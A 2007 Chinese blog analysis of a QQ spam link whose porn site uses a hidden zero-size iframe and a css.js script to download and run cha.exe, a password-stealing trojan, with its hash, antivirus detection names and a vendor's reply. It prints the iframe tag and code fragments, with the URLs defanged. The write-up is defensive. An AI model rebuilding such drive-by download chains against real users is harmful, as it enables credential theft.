endurer 原创
2007-03-29 第2版 补充瑞星的回复
2007-03-28 第1版
QQ收到如下信息:
/---
看**被插,看少女激情,没有你看不到的,只有你想不到的,地址hxxp://www.luoliao*3***.info狼友们快来! n(Z
---/
hxxp://www.luoliao*3***.info的主页包含代码:
/---
<iframe src="hxxp://bbs.co**ocb***b*s.com/pic***.htm?18***88-1" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://bbs.co**ocb***b*s.com/pic***.htm?18***88-1包含代码:
/---
<script src=css.js></script>
---/
css.js的内容为JavaScript脚本,主要功能是运行多重嵌套的自定义函数 gn(n),利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 cha.exe,保存为 %windir%,文件名由下面的代码:
/---
var number=Math.random()*n;return Math.round(number)+'.exe'
---/
随机生成,并利用Shell.Application 对象 Q 的 ShellExecute 方法执行命令:%windir%/system32/cmd.exe /c %windir%/*****.exe 来运行。
文件说明符 : D:/test/cha.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-27 23:44:53
修改时间 : 2007-3-27 23:44:54
访问时间 : 2007-3-27 0:0:0
大小 : 22445 字节 21.941 KB
MD5 : 689f4a7e2aba9ebedea00d3a9eacef6a
Kaspersky 报为 Trojan-PSW.Win32.Delf.qc。
主 题: |
病毒上报邮件分析结果-流水单号:6229241 |
发件人: |
"" <send@rising.net.cn> |
尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:cha.exe
病毒名:
Trojan.PSW.Liumazi.kr 我们将在较新的19.16.32版本(瑞星2006的18.72.32版本)中处理解决,请您届时将您的瑞星软件升级到19.16.32(瑞星2006的18.72.32版本)版本并且打开监控中心全盘杀毒。如果我们在测试过程中发现问题的话,我们会推迟一到两版本后升级。
分享到:
相关推荐
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
Trojan专杀工具,用着真不错;我在网上找了好长时间才长到的,愿意与大家一块来分享.另外,本人是教育行业的,分享一个好的英语资料下载站:http://www.51tjw.com
针对Trojan-Dropper.Win32.Dropkit.a病毒,清除所需要的工具包,包括金山反间谍2007、PowerRmv、sreng2.5
2020年trojan最新windows64客户端
1、Trojan-Ransom.Win32.Rakhni 2、Trojan-Ransom.Win32.Aura 3、Trojan-Ransom.Win32.Agent.iih 4、Trojan-Ransom.Win32.Autoit 5、Trojan-Ransom.AndroidOS.Pletor (安卓下的勒索软件) 6、Trojan-Ransom.Win32....
trojan-qt5 for linux
trojan
trojan-qt5.app.zip
RannohDecryptor是卡巴斯基推出的一个Rannoh勒索病毒解密工具,可以解密Rannoh在内的7款勒索软件加密的文件,包括Polyglot、Rannoh、AutoIt、Fury...7、Trojan-Ransom.Win32.CryptXXX (目前能解版本1、版本2,版本3)
Trojan Client
RECYCLER.exe变种,GHOST.PIF变种,KPE.exe(EKS.exe) Trojan.DL.VB.nua,services.exe变种,sysauto.exe变种,myserver变种,pegefile.pif(Trojan.PSW.Win32.Agent.mk), autorun.exe (Worm.Win32.Agent.h)等
V0.0.4c The Emergency Bug Fix for V0.0.4b V0.0.4b的紧急Bug修复 @TheWanderingCoel TheWanderingCoel released this 3 hours ago This is a version only contain these bug fixes: [Bug Fix] Fix Safari ...
Trojan-Qt5.dmg
增加5个变种的查杀,分别是Trojan.Win32.Undef.iqd,Trojan.Win32.Undef.pun,Trojan.Win32.Undef.kcq等 文件信息: Size: 148992 bytes File Version: 2.03 Modified: 2008年9月3日, 15:21:22 MD5: 0B85E5AFC3E...
2020.05.26更新 1.修复Safari PAC不工作 2.修复断开连接后privoxy不会释放端口 3.修改PAC立即生效 4.修复不开启http模式还检查http端口是否占用的bug
trojan-Qt5客户端-windows版本,小巧好用,图形化界面。
今天小编要给大家介绍一款功能强大、简单易用的木马查杀工具软件——Loaris Trojan Remover。软件能帮助用户清除系统中存在的各种病毒,可清除多达56万种特洛伊木马病毒。支持包括标准扫描。定制扫描和ActiveX三种...
安铁诺Trojan.VBS.StartPage.dy专杀 V2010.exe。针对1KB病毒
java-trojan-源码.rar